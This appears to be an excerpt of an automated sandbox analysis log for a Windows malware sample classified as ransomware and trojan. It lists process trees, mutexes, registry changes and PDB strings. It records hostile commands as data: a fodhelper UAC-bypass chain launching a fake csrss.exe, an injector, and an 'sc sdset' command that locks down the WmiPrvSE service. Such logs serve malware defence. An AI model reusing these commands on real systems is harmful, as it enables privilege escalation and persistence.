Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe" Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnlrizwa.4cp.ps1 Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@111/94@10/15
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:304:WilStaging_02
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03
Source: csrss.exe String found in binary or memory: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: kdsyitkxmS.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations Jump to behavior
Source: C:\Windows\rss\csrss.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Uninstaller Jump to behavior
Source: kdsyitkxmS.exe Static file information: File size 4379008 > 1048576
Source: kdsyitkxmS.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x40b400
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: kdsyitkxmS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
